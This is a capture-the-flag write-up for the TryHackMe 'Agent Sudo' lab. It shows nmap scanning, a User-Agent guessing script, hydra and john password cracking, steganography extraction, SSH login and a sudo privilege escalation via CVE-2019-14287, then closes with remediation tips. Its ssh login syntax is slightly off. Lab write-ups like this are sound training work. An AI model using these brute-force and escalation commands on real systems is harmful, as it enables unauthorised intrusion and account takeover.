[Linux] Agent Sudo

This page aims to provide a clear and comprehensive write-up for the Agent Sudo room on TryHackMe. I used Kali Linux to conduct the penetration test.

Reconnaissance

As usual, we start with enumeration:

sudo nmap 10.10.74.238

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Three open ports are identified in the 1-1000 range. Let's perform a deeper scan on these ports:

sudo nmap -A -p 21,22,80 10.10.74.238

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement

Enumeration

HTTP

Starting with HTTP, let's check the website. A message indicates we need a specific user-agent, which is a "codename". Using R as a user-agent returns a message about 25 employees. We can perform a dictionnary attack on the user-agent using the alphabet letters as dictionnary.

import requests

url = "http://10.10.74.238/"

alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']

for letter in alphabet:
    headers = {
        "User-Agent": letter,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
    }

    response = requests.get(url, headers=headers)

    if response.status_code == 200:
        if "codename" not in response.text:
            print(f"Agent:{letter}\n", response.text)

The output hints that the FTP password for user "chris" is weak.

FTP

Next, let's perform FTP enumeration to check for weak credentials using hydra. Given the user "chris," we'll use a dictionary attack on the password.

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.218.217 ftp

Success! We retrieve the credentials: chris:crystal. Now, we can use this to connect to the FTP server and download any accessible files.

Steganography

The file To_agentJ.txt is accessible, but two images are unreadable. We'll use steganography techniques to extract information.

First, let's run binwalk on cutie.png to identify embedded files:

binwalk -Me cutie.png

An embedded zip file, 8702.zip, requires a password.

We can retrieve it using john:

zip2john 8702.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

The password found is "alien". We can get access to "To_agentR.txt".

cat To_agentR.txt

This file contains another passphrase. We use this to extract hidden data from cute-alien.jpg:

steghide extract -sf cute-alien.jpg

This yields additional credentials: james:hackerrules!.

The only service which left is SSH. Let's hack it!

Exploitation

We can try our credential on the ssh service.

ssh james:hackerrules!@10.10.218.217

It works and we get our first access to the host machine.

Privilege escalation

Upon logging in, we check sudo permissions and the version. The system is vulnerable to CVE-2019-14287, which allows privilege escalation:

sudo -l
sudo --version
sudo -u#-1 /bin/bash

Remediation

• Use stronger passwords(e.g., FTP password).

• Use a password manager.

• Disable password authentication on SSH.

• Make software update (e.g., Sudo).